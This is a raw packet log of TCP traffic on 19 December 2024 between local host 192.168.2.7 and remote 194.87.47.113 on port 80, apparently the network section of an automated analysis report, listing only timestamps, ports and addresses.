Dec 19, 2024 08:47:25.219922066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.220120907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.220123053 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.220782042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.220885038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.220890999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.221551895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.221626043 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.221775055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.222311974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.222460032 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.222523928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.223119974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.223181009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.223300934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.223875999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.224028111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.224070072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.224683046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.224805117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.224879026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.225505114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.225558043 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.225651979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.226294994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.226394892 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.226414919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.227081060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.227190971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.227257967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.227880001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.227933884 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.228100061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.229245901 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.367247105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.367443085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.367531061 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.367780924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.368169069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.368459940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.368485928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.368830919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.368961096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.369198084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.375437021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.375500917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.375597954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.375977993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.376061916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.376286983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.376506090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.376583099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.376840115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.377243042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.377336025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.377540112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.377993107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.378127098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.378331900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.378825903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.379056931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.379060030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.379632950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.379688978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.379777908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.380354881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.380481958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.380558014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.381166935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.381247044 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.381325960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.381922007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.382049084 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.382100105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.382730961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.382874012 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.389709949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.389862061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.390218973 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.390259027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.390568972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.390681028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.390913010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.391264915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.391340971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.391910076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.392102957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.392260075 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.392469883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.392795086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.392844915 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.393227100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.393436909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.393486023 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.394009113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.394210100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.394537926 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.394825935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.395013094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.395127058 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.395598888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.395776987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.395843029 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.396404028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.396593094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.396661043 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.397183895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.397362947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.397427082 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.398082018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.398296118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.398732901 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.398767948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.398930073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.399094105 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.399571896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.399755001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.399945974 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.400341034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.400532007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.400728941 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.401184082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.401350975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.401415110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.401992083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.402184010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.402296066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.402846098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.403028965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.403239012 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.403544903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.403764009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.403825045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.404386997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.404556036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.404629946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.405113935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.405302048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.405385017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.405894995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.406070948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.406632900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.406723976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.406917095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.407335997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.407497883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.407670021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.407737970 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.408348083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.408477068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.408679008 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.409071922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.409271002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.409550905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.409836054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.410033941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.410195112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.410645962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.410850048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.410967112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.411458015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.411648989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.411690950 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.412226915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.412460089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.412662029 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.413044930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.413230896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.413384914 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.413836956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.414098978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.414144039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.414611101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.414815903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.414885998 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.415391922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.415591002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.415769100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.416172981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.416465998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.416568041 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.416989088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.417166948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.417231083 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.417779922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.417998075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.418075085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.418653011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.418844938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.419018030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.419362068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.419608116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.419950008 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.420277119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.420483112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.420584917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.425384045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.560978889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.561170101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.561177015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.561270952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.561815977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.561880112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.562261105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.563713074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.563719988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.563838959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.568711042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.568815947 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.568903923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.569238901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.569473028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.569578886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.569946051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.570053101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.570287943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.570837975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.570950031 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.571022987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.571511984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.571634054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.572268009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.572277069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.572390079 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.572565079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.573138952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.573215008 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.573815107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.573822021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.573903084 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.574440002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.574784994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.574793100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.574843884 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.575659037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.575733900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.576333046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.583842039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.584178925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.584270000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.584405899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.584413052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.584450960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.585083008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.585477114 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.585827112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.585834026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.585983038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.586153984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.586653948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.586661100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.586747885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.588239908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.588247061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.588339090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.588622093 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.588629961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.588753939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.589262009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.589268923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.589363098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.589920044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.590563059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.590569973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.590722084 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.591362000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.591368914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.591501951 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.591711044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.592156887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.592164040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.592196941 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.593679905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.593688011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.593766928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.594086885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.594094992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.594168901 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.595359087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.595366955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.595454931 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.595736027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.595745087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.595870018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.596354961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.596363068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.596543074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.597053051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.597362041 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.597743988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.597750902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.597826004 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.598182917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.598542929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.598550081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.598660946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.600131035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.600137949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.600194931 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.600538015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.600545883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.600609064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.601109982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.601171970 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.601459026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.601835012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.601841927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.601907969 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.602603912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.602737904 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.603280067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.603286982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.603355885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.604271889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.604279041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.604353905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.604592085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.604898930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.605422020 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.605437994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.605601072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.606245995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.606281996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.606426954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.606435061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.606525898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.607270002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.607378006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.608002901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.608011007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.608198881 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.608371019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.609128952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.609136105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.609308958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.609814882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.609822035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.609889984 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:25.610491037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:25.610536098 CET	49707	80	192.168.2.7	194.87.47.113
